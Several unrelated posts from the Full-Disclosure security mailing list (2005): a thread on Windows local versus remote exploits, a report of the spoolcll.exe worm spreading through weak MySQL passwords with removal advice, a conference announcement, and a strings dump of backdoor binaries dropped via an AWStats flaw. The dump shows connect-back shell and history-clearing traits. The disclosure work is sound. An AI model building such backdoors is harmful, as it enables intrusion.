> > But I would point out something much more important: there are many more local exploits than remote (on Windows just like any other OS).
> >
> > Local exploits: about 1-2 a month
> > * POSIX - OS/2 subsystem exploitation
> > * Debugging subsystem exploitation (DebPloit)
> > * 16-bit subsystem exploitation (NTVDM)
> > * Shatter Attacks
> > * Etc.
> >
> > Remote exploits: about once a year
> > * RPC/DCOM (blaster)
> > * LSASS (sasser)
> >
> > Basically, if you are logged in as an unprivileged user on a Terminal Server, you can easily become SYSTEM. If this Terminal Server is also a Domain Controller, game over.
>
> You forgot one important factor - the use of IE and Outlook for the fast direct-to-customer delivery of local exploits. Which *also* results in a Game Over

Assuming that the IE/Outlook bugs are privilege escalation bugs. There seem to be relatively few of those - all of the recent ones have given you credentials of the local user, not localsystem (or even admin).
[Full-Disclosure] Re: Full-Disclosure Digest, Vol 2, Issue 58
On Thu, 27 Jan 2005 11:51:08 -0500 (EST), [EMAIL PROTECTED]:

> Message: 8
> Date: Thu, 27 Jan 2005 00:18:21 -0500
> From: Mike Bailey [EMAIL PROTECTED]
> Subject: [Full-Disclosure] spoolcll.exe - new worm being distributed via mysql vulnerability?
> To: full-disclosure@lists.netsys.com
> Message-ID: [EMAIL PROTECTED]
> Content-Type: text/plain; charset=US-ASCII
>
> Aloha,
>
> Earlier tonight, I was sitting here at home doing some normal browsing and work, and my firewall alerted me that a program called spoolcll.exe was attempting to open up a port which I cannot remember now. I tried killing it, but it just came back, over and over again, each time spawning itself on a new port. Registry says the worm created a service called evmon; it cannot be paused or stopped, but it can be disabled.
>
> The only information about this worm on google is a discussion at the following url:
> http://forums.whirlpool.net.au/forum-replies.cfm?t=291921&p=1
> They are beginning to determine that it is being distributed via a hole in mysql.
>
> Do any of you know anything about this? Thanks in advance.
>
> --
> Love,
> Mike Bailey

It's a sort of new worm looking for MySQL weak root passwords. You get more info at Sans:
http://isc.sans.org/diary.php?isc=a508f4a185755af19ea8bd45444a570b

Boot in Safe Mode and delete that file. Then reboot. Of course, change your admin pass and firewall tcp port 3306.

--
Saludos/Regards
Luisma
- Chaos reigns within. Reflect, repent, and reboot. Order shall return.
[Full-Disclosure] CarolinaCon 2005 announcement
Various chapters of NC-2600 (Raleigh, Wilmington, Charlotte, Asheville, etc) are proud to announce the coming of:

CarolinaCon-2005

The event will be June 10th-12th in Raleigh, NC.

If interested in attending and/or presenting, please see the following link for existing and emerging details:
http://www.carolinacon.org

The only currently active links are Location (where registration/reservations can be made) and Speakers (kinda obvious).

Peace,
Vic
Re: [Full-Disclosure] Re: [ GLSA 200501-36 ] AWStats: Remote code execution
> I don't have the time to investigate the cgi and dc binaries. The cgi at least tries to daemonize and opens a TCP listening socket. They also try to replace the index page on the vulnerable site.

cgi:
    1495 1495 0 /dev/tty
    149E 149E 0 socket
    14AA 14AA 0 listen
    14C0 14C0 0 PsychoPhobia Backdoor is starting...
    254E 254E 0 init.c

dc:
    09C0 09C0 0 Welcome to Data Cha0s Connect Back Shell
    09E9 09E9 0 No More Damn Issue Commands
    0A20 0A20 0 Data Cha0s Connect Back Backdoor
    0A42 0A42 0 /bin/sh
    0A4D 0A4D 0 XTERM=xterm
    0A59 0A59 0 HISTFILE=
    0A63 0A63 0 SAVEHIST=
    0A6D 0A6D 0 Usage: %s [Host] port
    0A86 0A86 0 [*] Dumping Arguments
    0A9C 0A9C 0 [*] Resolving Host Name
    0AB4 0AB4 0 [*] Connecting...
    0AC6 0AC6 0 [*] Spawning Shell
    0AD9 0AD9 0 [*] Detached
    4321 4321 0 dc-connectback.c

cheers,
m.w